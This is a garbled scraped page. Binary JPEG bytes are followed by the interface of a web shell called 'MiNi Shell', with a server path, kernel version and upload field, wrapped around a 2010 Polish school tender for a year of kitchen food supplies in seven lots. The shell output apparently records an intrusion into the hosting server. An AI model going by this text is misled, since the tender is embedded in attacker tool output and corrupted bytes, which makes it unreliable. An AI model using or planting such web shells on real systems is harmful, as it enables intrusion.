JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101202/345133-N-2010.html

<p class="kh_header"><b>Radostowice: Zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2011 rok.</b><br>
<b>Numer ogłoszenia: 345133 - 2010; data zamieszczenia: 02.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice, woj. śląskie, tel. 32 212 52 26, faks 32 212 52 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkobielice.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2011 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup środków żywieniowych wraz z dostawą  na potrzeby kuchni szkolnej w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach  na 2011 rok , tj.  od 03.01.2011r. do 31.12.2011r.

Szczegółowy wykaz artykułów żywnościowych z podziałem na poszczególne części, wraz z ich rocznym zapotrzebowaniem zawarto w załącznikach do SIWZ. Ustala się  7 części podlegających zamówieniu. Wykonawca może złożyć ofertę na całość zamówienia, poszczególną część lub na wybrane części:

1.   Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie
2.   Część II - Mięso, wędliny, konserwy i wyroby mięsne
3.   Część III - Drób
4.   Część IV - Ryby, przetworzone i konserwowe
5.   Część V - Warzywa, owoce i przetwory
6.   Część VI - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja
7.   Część VII - Produkty sypkie i różne produkty spożywcze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.50.00.00-3, 15.80.00.00-6, 15.60.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania niezbędnej wiedzy i doświadczenia Wykonawca powinien przedłożyć wykaz dostaw - Załącznik nr 4 do SIWZ
Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie powinien wykonać (w przypadku świadczeń okresowych lub ciągłych mogą to być również dostawy wykonywane) co najmniej jednej dostawy o wartości powyżej 10 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania odpowiednim potencjałem technicznym Wykonawca powinien przedłożyć zamawiającemu  wykaz sprzętu transportowego przystosowanego do przewożenia artykułów żywnościowych zgodnie z obowiązującymi przepisami sanitarnymi zgodnie z Załącznikiem nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca powinien przedłożyć zamawiającemu oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - Załącznik nr 7 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkobielice.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach
43-262 Radostowice
ul. Topolowa 61.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2010 godzina 09:00, miejsce: Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach
43-262 Radostowice
ul. Topolowa 61.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Babeczki kruche z owocami	szt	30			
	Babka drożdżowa z rodzynkami 300 g	szt	18			
	Babka piaskowa 300 g	szt	20			
	Bułka grahamka 80g	szt	350			
	Bułka kajzerka 50g	szt	1600			
	Bułka kanapkowa (wek 300g)	szt	350			
	Bułka kukurydziana 70g	szt	300			
	Bułka maślana 80g	szt	450			
	Bułka pikantno-serowa 65g	szt	150			
	Bułka serowa 70g	szt	220			
	Bułka staropolska 100g	szt	2800			
	Bułka tarta	kg	140			
	Bułka zwykła 90g	szt	2600			
	Bułka żytnia 70g	szt	200			
	Chleb 1000g krojony	szt	700			
	Chleb krojony 500g. ze słonecznikiem 500 g	szt	20		
	Drożdżówka (różne smaki) 160 g	szt	150		
	Drożdżówka Mini (różne) 100g	szt	280			
	Drożdżówka podwójna	szt	40			
	Rogaliki Francuskie (różne) 150 g	szt	40		
	Jagodzianka 130g	szt	150			
	Keks 300 g	szt	6			
	Kołocz z jabłkami	kg	4			
	Kołocz z posypką	kg	4			
	Makowiec	kg	6			
	Pączki (różne)100g	szt	80			
	Pączki serowe	kg	6			
	Ciasto Półfrancuskie 170 g	szt	100			
	Rogal z nadzieniem (różne)150g	szt	140		
	Rogalik zwykły 100g	szt	550			
	Chleb wieloziarnisty, krojony, 500g.	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO , WĘDLINY, KONSERWY I WYROBY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Boczek wędzony	kg	25
	Kiełbasa domowa	kg	250
	Kiełbasa zwyczajna	kg	300
	Kiełbaska winerka	kg	60
	Kości wędzone	kg	120
	Łopatka wieprzowa b/k	kg	950
	Mortadela	kg	55
	Mielonka	kg	100
	Mięso garmażeryjne	kg	400
	Pasztet drobiowy Drob 160g	p	40
	Pasztet wieprzowy 	kg	9
	Schab z kością	kg	350
	Wołowe b/k	kg	60
	Żeberka wędzone	kg	10
	Szynka wieprzowa krojona	kg	15
	Szynka drobiowa krojona	kg	10
	Szynka prasowana wieprzowa krojona	kg	210
	Kiełbasa drobiowa krojona 	kg	15
	Kiełbasa szynkowa krojona	kg	10
	Pieczeń rzymska krojona	kg	5
	Kiełbasa kasztelańska	kg	10
	Polędwica krojona	kg	10
	Kiełbasa krakowska krojona	kg	5
             Szynka pieczona krojona	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka	kg	600
	Kurczak 	kg	60
	Porcje rosołowe	kg	200
	Podudzie z kurczaka	kg	130
	Udziec z kurczaka	kg	90
             Udziec z indyka	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z makreli w pomidorach170g	puszki	80
	Filet z soli	kg	190
	Paluszki panierowane (kostka)	kg	180
	Tuńczyk w sosie własnym 170g	puszki	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WARZYWA , OWOCE I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki	kg	5500
	Fasola Jaś	kg	50
	Groch łuskany 	kg	65
	Buraki	kg	250
	Cebula	kg	350
	Czosnek	szt	180
	Kapusta biała	kg	900
	Kapusta pekińska	szt	10
	Kapusta czerwona	kg	400
	Marchew	kg	520
	Ogórek zielony	kg	70
	Papryka świeża	kg	20
	Pieczarka	kg	80
	Pietruszka	kg	5
	Pomidor	kg	40
	Por	szt	320
	Rzodkiewka	pęczek	8
	Sałata	szt	4
	Banan	kg	600
	Brzoskwinie świeże	szt	35
	Brzoskwinie kondensowane 450 g	puszka	6
	Nektarynka 	szt	30
	Jabłka	kg	600
	Mandarynka 	kg	100
	Pomarańcza	kg	50
	Koncentrat pomidorowy 1l	szt	95
	Dżem Łowicz 280g lub równoważne	szt	220
	Fasola szparagowa Hortex 450g lub równoważne	paczka	15
	Papryka konserwowa 1 l	szt	15
	Groszek konserwowy 1 l	szt	15
	Kalafior świeży	szt	80
	Kalafior mrożony Hortex 450g lub równoważne	paczka	80
	Kalarepa	szt	10
	Kapusta kiszona	kg	350
	Mrożonka zupa Hortex 450g lub równoważne	 paczka	120
	Truskawka mrożona Hortex 450g lub równoważne	 paczka	25
	Ogórek kiszony	kg	90
	Ogórek konserwowy 1l.	szt	50
	Szpinak mrożony Hortex 450g lub równoważne	paczka 	60
	Brokuł mrożony Hortex 450g lub równoważne	paczka 	60
	Syrop owocowy 380 ml	szt	6
	Marchewka z groszkiem - mrożonka, 450g.	paczka	20
	Groszek - mrożonka, 450g.	paczka	10
	Sok wieloowocowy typy Kubuś 250ml.	sztuk	300
	Brokuł świeży	sztuk	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> OLEJE TŁUSZCZE ZWIERZĘCE I ROŚLINNE, PRODUKTY MLECZARSKIE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej uniwersalny 1l	szt	400
	Margaryna mleczna Bielmar 250g lub równoważny	szt	550
	Kefir 400ml	szt	160
	Jogurt Jogobella 125g lub równoważny	szt	90
	Serek homo Danio 150g lub równoważny	szt	200
	Masło ekstra 200g	szt	1800
	Mleko 3,2% Łowickie 1l lub równoważny	szt	550
	Ser biały krajanka Pszczyna lub równoważny	kg	180
	Serek topiony 100g	szt	100
	Ser żółty krojony	kg	60
	Śmietana 12% Łowicka 500g lub równoważny	szt	150
	Śmietana zakwaszana 400ml 18%	szt	90
	Śmietana 30% 400ml	szt	10
             Jaja	szt	5000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PRODUKTY SYPKIE I RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sól	kg	140
	Mąka ziemniaczana Superior lub równoważny	kg	200
	Cytrynka Sztar 1 l.	szt	380
	Soczek dla dzieci 200 ml	szt	850
	Napój dla dzieci 300 ml	szt	580
	Kasza gryczana	kg	50
	Kasza manna	kg	16
	Kasza jęczmienna	kg	26
	Mąka pszenna Brzeska lub równoważny	kg	350
	Ryż	kg	250
	Wafelek śmietankowy 	szt	300
	Wafel czekoladowy Princeska lub równoważny	szt	800
	Herbatniki mały	szt	220
	Biszkopty podłużne	szt	40
	Wafel Lion lub równoważny	szt	1550
	Wafel Snickers lub równoważny	szt	1550
	Wafle KinderBueno lub równoważny	szt	1550
	Cukier	kg	1800
	Kakao DekoMorreno 200g lub równoważny	szt	30
	Płatki czekoladowe Nestle 500g lub równoważny	szt	25
	Makaron świderki Lubella 500 g lub równoważny	kg	250
	Makaron domowy Czaniec 250g lub równoważny	szt	46
	Makaron łazanki Lubella lub równoważny	kg	40
	Makaron zacierka 250 g	kg	40
	Kawa Inka 150 g lub równoważny	szt	10
	Herbata 100g	szt	750
	Cynamon sypki 15 g 	szt	100
	Gałka muszkatowa 10 g	szt	20
	Ketchup Hortex 500 g.lub równoważny	szt	40
	Liść laurowy 6 g	szt	40
	Majeranek 10 g	szt	26
	Majonez	l	80
	Ocet 0,5 l	szt	40
	Papryka słodka 20g	szt	140
	Zioła prowansalskie 20 g	szt	80
	Pieprz 20 g	szt	150
	Ziele angielskie 15 g	szt	80
	Budyń z cukrem Winiary lub równoważny	szt	140
	Cukier waniliowy 10 g	szt	130
	Drożdże 100g	szt	15
	Galaretka Winiary 100 g	szt	130
	Jarzynka sucha Kucharek lub równoważny 200g	szt	450
	Przyprawa do zup i sosów typu Maga 850ml	szt	80
	Żurek kiszony 1l	szt	180
             Musztarda 1l	szt	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com